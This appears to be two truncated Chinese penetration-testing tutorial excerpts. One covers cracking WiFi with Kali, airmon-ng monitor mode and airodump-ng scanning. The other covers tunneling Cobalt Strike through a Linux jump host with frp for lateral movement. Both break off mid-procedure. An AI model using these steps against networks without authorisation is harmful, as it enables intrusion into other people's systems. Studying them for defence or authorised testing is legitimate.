01、环境搭建①kali linux
下载安装kali虚拟机,官网:https://www.kali.org/
②一张usb网卡
推荐使用 RT3070网卡(仅支持2.4Ghz频段的WiFi)或者 MT7921U网卡(支持2.4Ghz、5Ghz频段的WiFi)
将USB插入电脑,选择 “连接到虚拟机”,并选择kali系统接入即可。
02、破解过程①查看网卡是否被识别
命令:
1ip a
出现 wlan0 这个网卡就代表识别成功
②开启监听模式
命令:
1airmon-ng start wlan0
执行成功后,网卡名 wlan0 将变为 wlan0mon
③扫描附近的WiFi
命令:
1airodump-ng wlan0mon
重点关注以下几个字段:
123456BBSID:路由器的mac地址PWR:WiFi的信号强度。这个值越接近0表示信号越好CH:WiFi所在的信道ENC:WiFi所采用的加密类型ESSID:WiFi名称STATION:连接到WiFi的客户端的mac地址
这是扫描出的WiFi:
这是连接到WiFi的客户端:
④WiFi抓包
注意:另开一个命令行 ...
01、背景介绍在使用cobalt strike的场景中,很多时候会遇到内网机是Windows不出网,而外网机是Linux的,而且外网机只能获取到低权限来转发流量。如果此时想使用cobalt strike来横向的话,需要使用Linux机器作为跳板机来进行操作。
前期准备:
①一台云服务器(即跳板机,安装了frp)
②一台攻击机(安装了CS和frp)
02、环境配置这里使用frp进行流量转发
2.1 跳板机_192.168.3.3
先给frps赋予执行权限:
1chmod 700 frps
然后直接启动服务端:
1./frps -c frps.ini
其中frps.ini的配置信息(默认不用修改):
12[common]bind_port = 7000
同时将云服务器的一些端口提前打开,方便后续端口的连接:(在云服务器的管理控制台进行配置)
2.2 攻击机_192.168.3.2
先给frpc赋予执行权限:
1chmod 700 frpc
然后直接启动客户端:
1./frpc -c frpc.ini
其中frpc.ini的配置信息(默认,服务端IP需改成跳板机IP):
12 ...
















